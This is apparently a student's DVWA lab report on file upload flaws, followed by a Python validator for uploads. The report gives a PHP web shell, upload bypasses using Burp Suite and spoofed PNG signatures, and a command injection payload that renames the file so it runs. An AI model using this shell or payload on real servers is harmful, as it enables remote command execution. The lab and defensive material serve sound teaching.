
File Upload Vulnerability in DVWA: Lab Experiment - 8

The document describes three experiments on file upload vulnerabilities in DVWA (Damn Vulnerable Web Application). In the low vulnerability setting, any file type can be uploaded, allowing a PHP web shell to be uploaded and executed. In the medium setting, only images can be uploaded, but modifying the file extension in Burp Suite allows uploading an executable file. In the high setting, file signatures are modified in a hexadecimal editor to trick the server into thinking an executable file is an image file, allowing it to be uploaded and later renamed to be executable.

Uploaded by

viwajd

Name : Vishal Kumar
Date : 15/10/2020

Sap id : 500076544
Roll No. : R134219106
Batch : B4 (CSF SEM III )
Subject : IT Applications & Data Security Lab

Lab Experiment – 8
File Upload Vulnerability in DVWA

LOW: (No restrictions. Any file types are allowed)


Open any editor and create a file. Write the following code to create a web shell.

<?php
$cmd=$_GET['cmd'];
system($cmd);
?>

Now save the file as ‘file1.php’.

Upload the file; it will be accepted.
To check whether the shell is running, go to “127.0.0.1/DVWA/hackable/uploads/file1.php?cmd=pwd”. The command will be executed.

MEDIUM: (Only image file types i.e. JPEG, PNG are allowed)
Write the same web shell, but save it under the name ‘file2.php.png’.

Select the file, but before uploading it, open Burp Suite and turn the interceptor on.
Then upload the file; the request will be intercepted in Burp.
In the Burp interceptor, change the extension back by editing the file name to ‘file2.php’.
Forward the request. The file will be uploaded.
Go to “127.0.0.1/DVWA/hackable/uploads/file1.php?cmd=pwd” and check.

HIGH: (Uses the getimagesize() function, so the file signature must be that of an image)
We will edit the file signature in a hexadecimal editor.
Write the same web shell and save it as file3.png. Use the xxd editor to edit the file signature.
# apt-get install xxd
# apt-get update

# xxd file3.png hexdump


# gedit hexdump

Now go to the link (https://www.garykessler.net/library/file_sigs.html).


Copy the file signature for a PNG file and paste it at the beginning of the hex code of the png file in gedit.

Convert the hex code back to an image file.


# xxd -r hexdump file4.png
Now upload the file. It will be uploaded, but it is an image file and not an executable. To rename it, use the command injection vulnerability. Go to Command Injection and insert the following command.

127.0.0.1|mv ../../hackable/uploads/file4.png ../../hackable/uploads/file4.php


The uploaded file should now be executable.
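
From the defending side, the three levels fail for the same reason: the server trusts something the client controls (the file name, then the extension, then only the leading signature bytes). The following is an added example, not part of the lab report or of DVWA's code, of an upload check that rejects all three inputs; the function names, the PNG-only allowlist and the sample inputs are assumptions made for illustration.

```python
import secrets
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
ALLOWED_EXT = {"png"}  # assumption: this endpoint accepts PNG only

def chunk(ctype: bytes, body: bytes = b"") -> bytes:
    """Build one PNG chunk: length, type, data, CRC-32 over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

def png_is_well_formed(data: bytes) -> bool:
    """Walk every chunk: IHDR first, IEND last, valid CRCs, no trailing bytes."""
    if not data.startswith(PNG_SIG):
        return False
    pos, first, last = len(PNG_SIG), None, None
    while pos + 12 <= len(data) and last != b"IEND":
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            return False  # declared chunk length runs past the end of the file
        (crc,) = struct.unpack(">I", data[end - 4:end])
        if zlib.crc32(data[pos + 4:end - 4]) & 0xFFFFFFFF != crc:
            return False
        first, last, pos = first or ctype, ctype, end
    return first == b"IHDR" and last == b"IEND" and pos == len(data)

def validate_upload(client_name: str, data: bytes):
    """Return (accepted, stored name or rejection reason)."""
    parts = client_name.lower().split(".")
    if len(parts) != 2 or parts[1] not in ALLOWED_EXT:
        return False, "extension"  # file1.php, file2.php, file2.php.png
    if not png_is_well_formed(data):
        return False, "content"    # a signature glued onto non-image bytes
    # The stored name and extension are chosen by the server, never the client.
    return True, secrets.token_hex(16) + ".png"

# Constructed sample inputs (not taken from the lab report).
REAL_PNG = (PNG_SIG
            + chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
            + chunk(b"IDAT", zlib.compress(b"\x00\x00"))
            + chunk(b"IEND"))
SIG_ONLY = PNG_SIG + b"<?php /* constructed placeholder body */ ?>"

if __name__ == "__main__":
    for name, body in [("file1.php", SIG_ONLY), ("file2.php.png", REAL_PNG),
                       ("file4.png", SIG_ONLY), ("photo.png", REAL_PNG)]:
        print(name, validate_upload(name, body))
```

A structurally valid PNG can still carry arbitrary bytes inside its chunks, so this check belongs alongside re-encoding the image and serving uploads from a location where the web server does not execute scripts. The rename step in the HIGH experiment depends on the separate command injection flaw, which has to be fixed on its own.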
